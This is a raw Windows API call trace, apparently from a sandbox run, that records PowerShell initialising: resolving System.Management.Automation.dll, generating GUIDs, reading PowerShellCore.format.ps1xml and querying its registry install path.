	[0632.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.660] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0632.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0632.662] VirtualQuery (in: lpAddress=0x16b9d0, lpBuffer=0x16c890, dwLength=0x30 | out: lpBuffer=0x16c890*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0632.666] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x268b8f2d, Data2=0x4a71, Data3=0x4ded, Data4=([0]=0x8f, [1]=0xa3, [2]=0x4e, [3]=0xe8, [4]=0x2c, [5]=0x7a, [6]=0x9d, [7]=0x33))) returned 0x0
	[0632.667] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe121bb61, Data2=0x8f9b, Data3=0x42a9, Data4=([0]=0xa5, [1]=0x3e, [2]=0xc9, [3]=0x16, [4]=0x2f, [5]=0xe5, [6]=0x3a, [7]=0xbb))) returned 0x0
	[0632.668] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd6cc0bd4, Data2=0x8259, Data3=0x4db6, Data4=([0]=0xa2, [1]=0xfe, [2]=0x30, [3]=0x81, [4]=0x96, [5]=0xea, [6]=0xa7, [7]=0xd4))) returned 0x0
	[0635.005] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x3651aad7, Data2=0x31bc, Data3=0x4b7c, Data4=([0]=0x8d, [1]=0x9, [2]=0x97, [3]=0x25, [4]=0x90, [5]=0x2c, [6]=0xb9, [7]=0xa))) returned 0x0
	[0635.006] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe055b708, Data2=0x2253, Data3=0x4743, Data4=([0]=0xa8, [1]=0x2a, [2]=0xd2, [3]=0xd0, [4]=0x91, [5]=0x2f, [6]=0xcd, [7]=0x7e))) returned 0x0
	[0635.006] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x5f5a08b3, Data2=0x8e84, Data3=0x4fd5, Data4=([0]=0x87, [1]=0xd1, [2]=0x15, [3]=0xdb, [4]=0x90, [5]=0xd5, [6]=0x76, [7]=0xa))) returned 0x0
	[0635.006] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x72268b05, Data2=0x2894, Data3=0x4af9, Data4=([0]=0x8c, [1]=0x27, [2]=0x44, [3]=0x7e, [4]=0x5c, [5]=0x11, [6]=0x49, [7]=0x1a))) returned 0x0
	[0635.007] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x83bfa3ba, Data2=0xf0aa, Data3=0x4f68, Data4=([0]=0x80, [1]=0x1f, [2]=0x43, [3]=0x39, [4]=0x6b, [5]=0xb0, [6]=0x20, [7]=0xc0))) returned 0x0
	[0635.007] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x505d6aa7, Data2=0xeaf5, Data3=0x4481, Data4=([0]=0xb8, [1]=0x7e, [2]=0xd6, [3]=0x8a, [4]=0x9d, [5]=0xf, [6]=0xac, [7]=0x6c))) returned 0x0
	[0635.007] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd9bc6215, Data2=0x95a6, Data3=0x4b1b, Data4=([0]=0x94, [1]=0xb5, [2]=0x8e, [3]=0x7f, [4]=0x39, [5]=0x6b, [6]=0x99, [7]=0xa4))) returned 0x0
	[0635.007] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xc3656538, Data2=0x1de8, Data3=0x4e7c, Data4=([0]=0x9c, [1]=0x17, [2]=0x69, [3]=0x36, [4]=0x34, [5]=0x1f, [6]=0x7c, [7]=0xb1))) returned 0x0
	[0635.008] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x2683bd27, Data2=0x1a65, Data3=0x4199, Data4=([0]=0xaa, [1]=0xb8, [2]=0x1c, [3]=0x9f, [4]=0x2a, [5]=0xeb, [6]=0xe9, [7]=0xb9))) returned 0x0
	[0635.010] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x7cd5d4a7, Data2=0x3a66, Data3=0x4534, Data4=([0]=0x9d, [1]=0xc6, [2]=0xb7, [3]=0xb6, [4]=0xb6, [5]=0x82, [6]=0x3d, [7]=0xc7))) returned 0x0
	[0635.011] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xff853795, Data2=0x2e57, Data3=0x41a5, Data4=([0]=0x8f, [1]=0xa6, [2]=0x17, [3]=0xeb, [4]=0xa8, [5]=0xd, [6]=0x8, [7]=0x3f))) returned 0x0
	[0635.012] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x8321cd77, Data2=0xfa82, Data3=0x4167, Data4=([0]=0xa9, [1]=0x4c, [2]=0x7c, [3]=0x40, [4]=0xe5, [5]=0x28, [6]=0xc, [7]=0x34))) returned 0x0
	[0635.012] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xc33abd2d, Data2=0x4255, Data3=0x4225, Data4=([0]=0xb4, [1]=0x45, [2]=0x6, [3]=0xf8, [4]=0x9, [5]=0x3b, [6]=0xc5, [7]=0x7f))) returned 0x0
	[0635.012] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x9fa5e38c, Data2=0x9abd, Data3=0x4159, Data4=([0]=0xb3, [1]=0x49, [2]=0x42, [3]=0x8a, [4]=0xf2, [5]=0x84, [6]=0x15, [7]=0x85))) returned 0x0
	[0635.013] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xeee1e97a, Data2=0xbe64, Data3=0x4781, Data4=([0]=0xb9, [1]=0x6b, [2]=0xf8, [3]=0x2, [4]=0x39, [5]=0x9b, [6]=0x7c, [7]=0x4f))) returned 0x0
	[0635.013] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe6a82e9b, Data2=0x2c6a, Data3=0x4af3, Data4=([0]=0x87, [1]=0xa8, [2]=0x98, [3]=0xb6, [4]=0xdf, [5]=0xf7, [6]=0x60, [7]=0x88))) returned 0x0
	[0635.013] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe53e37ec, Data2=0x1284, Data3=0x4deb, Data4=([0]=0xb3, [1]=0x1e, [2]=0x38, [3]=0xd, [4]=0xee, [5]=0x5c, [6]=0x37, [7]=0x3c))) returned 0x0
	[0635.013] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb1c1a440, Data2=0x2d4a, Data3=0x48c9, Data4=([0]=0xb2, [1]=0x53, [2]=0xce, [3]=0xe9, [4]=0x21, [5]=0xec, [6]=0x1b, [7]=0x88))) returned 0x0
	[0635.013] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x4c4f736, Data2=0x8c4e, Data3=0x4a2f, Data4=([0]=0xaf, [1]=0x31, [2]=0x2d, [3]=0x2, [4]=0x42, [5]=0xb, [6]=0x89, [7]=0x78))) returned 0x0
	[0635.014] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0635.014] GetFileType (hFile=0x2e4) returned 0x1
	[0635.014] SetErrorMode (uMode=0x1) returned 0x1
	[0635.014] GetFileType (hFile=0x2e4) returned 0x1
	[0635.014] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.021] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.021] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.022] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.022] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.022] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.022] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.022] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.023] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.025] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.026] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.026] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.027] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.027] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.028] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.028] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.028] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.033] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.033] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.034] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.034] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0635.034] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0xe67, lpOverlapped=0x0) returned 1
	[0635.035] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc4f97, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc4f97*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0635.035] ReadFile (in: hFile=0x2e4, lpBuffer=0x2fc59c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2fc59c8*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0635.046] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e4) returned 0x0
	[0635.046] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0635.046] CoTaskMemAlloc (cb=0x5a) returned 0x26f2b0
	[0635.046] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26f2b0, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0635.046] CoTaskMemFree (pv=0x26f2b0) 
	[0635.047] RegCloseKey (hKey=0x2e4) returned 0x0
	[0635.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0635.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x7563e404, Data2=0xe5d0, Data3=0x4411, Data4=([0]=0x96, [1]=0xfb, [2]=0x17, [3]=0xa, [4]=0x8f, [5]=0x4e, [6]=0x80, [7]=0xf))) returned 0x0
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x979c53bf, Data2=0x6c66, Data3=0x4853, Data4=([0]=0xa3, [1]=0x64, [2]=0xcd, [3]=0xd2, [4]=0x88, [5]=0x88, [6]=0xdd, [7]=0x6c))) returned 0x0
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd495ab2d, Data2=0xf78, Data3=0x45dd, Data4=([0]=0x8e, [1]=0x3a, [2]=0x36, [3]=0xbc, [4]=0x6e, [5]=0xdb, [6]=0xcc, [7]=0x31))) returned 0x0
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xae366d0c, Data2=0x3893, Data3=0x4846, Data4=([0]=0x8d, [1]=0xad, [2]=0x3d, [3]=0xc5, [4]=0xed, [5]=0x4c, [6]=0xa7, [7]=0xc8))) returned 0x0
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x6e723a91, Data2=0xc2a5, Data3=0x4fbd, Data4=([0]=0xb4, [1]=0x31, [2]=0x36, [3]=0x79, [4]=0x6f, [5]=0x5a, [6]=0x1a, [7]=0x91))) returned 0x0
	[0636.937] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb8727967, Data2=0x35a7, Data3=0x43bb, Data4=([0]=0x98, [1]=0x33, [2]=0xe4, [3]=0x0, [4]=0x8e, [5]=0x3f, [6]=0xb9, [7]=0x55))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xaf3d1731, Data2=0x51f9, Data3=0x44ed, Data4=([0]=0x89, [1]=0x8d, [2]=0x5a, [3]=0x67, [4]=0x7, [5]=0x73, [6]=0x7a, [7]=0x31))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd240cb82, Data2=0x7b48, Data3=0x4680, Data4=([0]=0x89, [1]=0x9, [2]=0x70, [3]=0x6b, [4]=0x2d, [5]=0x81, [6]=0x5, [7]=0xa9))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x60a03656, Data2=0x98a3, Data3=0x485b, Data4=([0]=0xba, [1]=0xdf, [2]=0x68, [3]=0x2e, [4]=0x52, [5]=0xe5, [6]=0xd5, [7]=0xda))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe3aba67a, Data2=0x37fa, Data3=0x40b6, Data4=([0]=0xbe, [1]=0x8f, [2]=0x6b, [3]=0xeb, [4]=0xe2, [5]=0x4b, [6]=0x8e, [7]=0xac))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x56a170e0, Data2=0x7e21, Data3=0x4fe2, Data4=([0]=0xbb, [1]=0x55, [2]=0x4c, [3]=0x52, [4]=0xcf, [5]=0x34, [6]=0x4e, [7]=0x8b))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x92b42030, Data2=0x8621, Data3=0x41ff, Data4=([0]=0x96, [1]=0xb7, [2]=0xd6, [3]=0x65, [4]=0xdc, [5]=0xc, [6]=0x33, [7]=0xb1))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x9ee9d541, Data2=0x91f8, Data3=0x4e73, Data4=([0]=0xae, [1]=0x26, [2]=0xcd, [3]=0x31, [4]=0xf4, [5]=0xa5, [6]=0x14, [7]=0x39))) returned 0x0
	[0636.938] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe0798af9, Data2=0xb97a, Data3=0x4c04, Data4=([0]=0x99, [1]=0xcf, [2]=0x83, [3]=0x93, [4]=0x2f, [5]=0x1, [6]=0x45, [7]=0x77))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x296915e9, Data2=0x107a, Data3=0x4d27, Data4=([0]=0x8c, [1]=0xf3, [2]=0x63, [3]=0xe2, [4]=0x86, [5]=0x6b, [6]=0x99, [7]=0x97))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x92b8e953, Data2=0x57d0, Data3=0x462f, Data4=([0]=0xaf, [1]=0xc9, [2]=0x29, [3]=0x47, [4]=0xbe, [5]=0x4d, [6]=0xc1, [7]=0xdd))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x54e8be12, Data2=0x88f9, Data3=0x4f23, Data4=([0]=0x8a, [1]=0x47, [2]=0x53, [3]=0x50, [4]=0x43, [5]=0x39, [6]=0xa2, [7]=0x84))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xbb2a559, Data2=0x2097, Data3=0x45df, Data4=([0]=0xb4, [1]=0xc3, [2]=0x83, [3]=0x61, [4]=0x52, [5]=0x9, [6]=0x4f, [7]=0x94))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa89f9394, Data2=0x49c1, Data3=0x42aa, Data4=([0]=0xab, [1]=0x31, [2]=0xa9, [3]=0x58, [4]=0x1a, [5]=0x17, [6]=0xb6, [7]=0x14))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x999bd3cf, Data2=0x1953, Data3=0x4e55, Data4=([0]=0xb3, [1]=0xbf, [2]=0x7b, [3]=0xfe, [4]=0xdf, [5]=0x88, [6]=0xb, [7]=0x71))) returned 0x0
	[0636.939] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x5f02a8f, Data2=0x1ad5, Data3=0x49c3, Data4=([0]=0x86, [1]=0x18, [2]=0x20, [3]=0x7d, [4]=0xb4, [5]=0xf5, [6]=0xea, [7]=0xc6))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa463edd8, Data2=0x3542, Data3=0x44c3, Data4=([0]=0xb3, [1]=0x52, [2]=0x7e, [3]=0x7e, [4]=0x63, [5]=0xb5, [6]=0x9e, [7]=0xef))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xcaa1f37, Data2=0x1382, Data3=0x4d79, Data4=([0]=0xaa, [1]=0x98, [2]=0x31, [3]=0xb, [4]=0x96, [5]=0x91, [6]=0x10, [7]=0xf9))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x86b5f0a2, Data2=0x815b, Data3=0x4909, Data4=([0]=0x9a, [1]=0xf6, [2]=0x13, [3]=0xad, [4]=0x9f, [5]=0x88, [6]=0xee, [7]=0x1c))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xdd07a2e0, Data2=0x6f54, Data3=0x4286, Data4=([0]=0x8b, [1]=0x88, [2]=0x87, [3]=0x4b, [4]=0x54, [5]=0x5f, [6]=0xbd, [7]=0x8b))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa398900c, Data2=0xab5b, Data3=0x49e7, Data4=([0]=0x9b, [1]=0x4c, [2]=0xc, [3]=0xb9, [4]=0x57, [5]=0xf4, [6]=0x75, [7]=0xea))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd246cab1, Data2=0xd694, Data3=0x4c6a, Data4=([0]=0xb5, [1]=0xa2, [2]=0xf1, [3]=0x54, [4]=0x6b, [5]=0xa3, [6]=0x83, [7]=0x10))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x74e8246, Data2=0x22c4, Data3=0x4671, Data4=([0]=0xb1, [1]=0x96, [2]=0x94, [3]=0x71, [4]=0xb2, [5]=0xc3, [6]=0xf4, [7]=0xc7))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xfd1408f8, Data2=0x86ea, Data3=0x44de, Data4=([0]=0x88, [1]=0xb6, [2]=0x8f, [3]=0x1d, [4]=0xc3, [5]=0xe5, [6]=0x3b, [7]=0xfc))) returned 0x0
	[0636.940] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb9bbfca8, Data2=0x772, Data3=0x4c6f, Data4=([0]=0xa7, [1]=0x3b, [2]=0x9e, [3]=0x6e, [4]=0xce, [5]=0xa8, [6]=0x43, [7]=0xa3))) returned 0x0
	[0636.941] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x949ba4c9, Data2=0xda0, Data3=0x4745, Data4=([0]=0xab, [1]=0xe0, [2]=0xe0, [3]=0xd3, [4]=0xc5, [5]=0x89, [6]=0x8b, [7]=0x2b))) returned 0x0
	[0636.941] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xd952f7c3, Data2=0xa573, Data3=0x4dca, Data4=([0]=0x89, [1]=0x7, [2]=0xed, [3]=0xa9, [4]=0xf6, [5]=0xc0, [6]=0xbd, [7]=0x6))) returned 0x0
	[0636.941] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe040df48, Data2=0xd141, Data3=0x4eda, Data4=([0]=0xa2, [1]=0x7b, [2]=0xc8, [3]=0xa, [4]=0xcc, [5]=0x89, [6]=0xc2, [7]=0x6f))) returned 0x0
